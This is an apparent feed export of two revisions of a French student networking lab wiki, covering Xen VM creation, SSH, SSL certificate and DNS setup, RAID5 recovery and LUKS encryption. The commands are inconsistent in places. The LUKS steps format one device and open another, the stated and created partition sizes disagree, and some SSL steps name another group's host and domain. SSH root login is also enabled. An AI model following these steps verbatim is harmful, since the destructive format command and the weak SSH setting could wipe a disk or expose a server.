       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
arrêtez la machine virtuelle, retirez lui une des trois partitions, relancez la. Essayez de remonter votre RAID5, que constatez-vous ? &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
 On copie des données sur le RAID5.&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46199</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46199"/>
				<updated>2017-11-13T10:37:16Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Certification SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/apache2/sites-available/clef# ls GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
 root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
 root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
